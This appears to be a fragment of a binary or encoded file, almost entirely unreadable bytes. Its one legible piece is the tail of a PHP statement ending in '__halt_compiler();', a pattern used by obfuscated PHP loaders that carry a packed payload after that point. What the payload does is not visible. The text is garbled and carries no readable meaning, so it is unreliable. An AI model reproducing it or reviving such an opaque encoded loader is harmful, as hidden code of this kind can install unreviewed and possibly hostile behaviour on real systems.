��\"�1��Dp�!�M9‹?��}P�Tf���6Q;���(4��v/kL+�N�Ȓ����u��nJu`���tZ�Kԛ���xfZ#��U�s�Lֺtbp��T�ۥRʧ�=�����Ry�-v]B�i���C�+� v,��b�=s�\"Γ�]���gy�,��ӕ�A'���\"���I��D{�K- ^h�O��U4\"u��1�'���ts��6��]�fIC^� �N�����k�J�C����� rΕ�i�E�� �s7fϼ��Q��(u���� UJ����{Z9ƾϠh�n�„ҵ�Y��D���%݃��@�[�u�uP�@��� <3?�m��,픫��{� �7zWq��?j:���q����U���X.��х:>m�\$��0���o .� Z�D�3p���,��˜�8������ϒ� �p��:#>Qk��_EwY���QsC��+�J�\$�h��_!��[z%�B�5����z�\\U�\\̷��!1���ؒ2�(�/>��z��UA�v���ɀ��c���^`͢@� �E�}�;�h�ވ��{�:�%��\\��+}o_���H?��5��\\��^o[���剂��[�p��týp֟�\"΍f�}6\"ZW�vIake��z�ٯſS����?\"����h�7&yo��\"[ƒ�}�/�f�+p2G��l[������!3��) ����iQ>�jw�l3���=)��,�=/.�ޖ��u����?�y�y�Ourb2|m��DS�tE�{\\�F����&��M��cw�E�;�#�E�2n� ف�ݮ �yr-7A!ŹYm�I/�0P����R���9dn��Ϝ���pˎ`�sS�R�;��g�' ,�O� \"��@��lߍ7 ��.�޸Og��8����J��*�2���� N�Cz������R�/��#����n�0�_D]BDA��ᶐz��K?�����Q7<�T衰�YS*g.,2�3+��玺 �q�ヌՠv��� ��5�3j�!�8�9"));__halt_compiler();�����������Ў��Ǎ�� Ж�����Ӑ����� ����������׽�����Ļ�����乬�����ʨ����������������������� �ķ�ـΧ� ޛ�ݑ�����������ڃ���͞��������Ǜ���鏌��������϶�Ƒ�����������ˬޗ��³ȋ�� ��ᴫ������׸����ҍ� ������� ����ҍ���۩� �Ֆ��������� ��Ə���A.�Đ�-�MW=�̕�>��J�\6 �����XǺ� ��� �wg ��S����qc�/��DS����_���A�ۘO{��J1�]\qPWF����Z'e|��s*_ӶoR����-���k҄wq|�G��ٗE�%�[��8{t�A�_������V6}RCߛ_ꍁL^0��<@*D�� �"Y�k�79q�������^�:��_V��A���t�|�F+y^�h�B��G�Ga��۷h��%X��K�iB��b�2��a:N� \Q�l0�s&���˙���>٤3cpo��ds��$�;�B\�C ����LK�H�տ1�� �,�yO�+Y�ވZ����@������>4� /)omXF��0�v�e9 \D�2���nn��h�@�Fq���D-zQ��;h����A$�F ��K�ѯ `3�'ތ��>�zM3C�1O�mMES��B`���K��%��DY���i�)7%_>�_ƃ�EՃ� ћ���I?B�ą)�K�J�E�=��^�(���,����ox�������]�[�$� ��s^�0ٕ9�\<��L�ox�v+\"�h���G�#� ʃ`�� ��k)�#���՟�a�d��i�$�[�M�L���@��ٯ���M q1�Կ��p>v��̬d��$Y�N�% 7����H�XUy5�I -�N��U�����l`.�G���߆^�$��������Z�~�8�e_��/��=k�g�7�����K� ��D��E �P9/��$>�VP�\(�r�Q{�V(�P����F qq0�lA>��ֻY ����)/�[]�@���[���3�wα�v�Fj�}���a�˽`�B�qF�}>��X��|-ԓ�Ոf�u�������_n�5]+� tm����9 ]�-Dw6�5�?�-��]s"+(C�|e(�y���~44�'�)M~��O�u=�B=U��b��x��\��c��#D-iB��o��^�"Z�T'�u^m6��+Y��t��gT*ɜ�ҿ*����uX�+Eӫ��=�X*� �xudW��>�6��� ��Z�&���\� x�,�#� m���x�*� �z�����f�xAN �<�ͱ�AW���jQ ���"<�ꦽ�V��˷p�-����g�=ø� X@v�/^����(�Wx�|��VhԠ:i�iK0l�E2_�N�jZ��0�1�i�&�݉jx����"J�4M�%��gU�\6�T~$��/��&q�n�K��d8��@e������U��,4}G�h��(pZ4!Y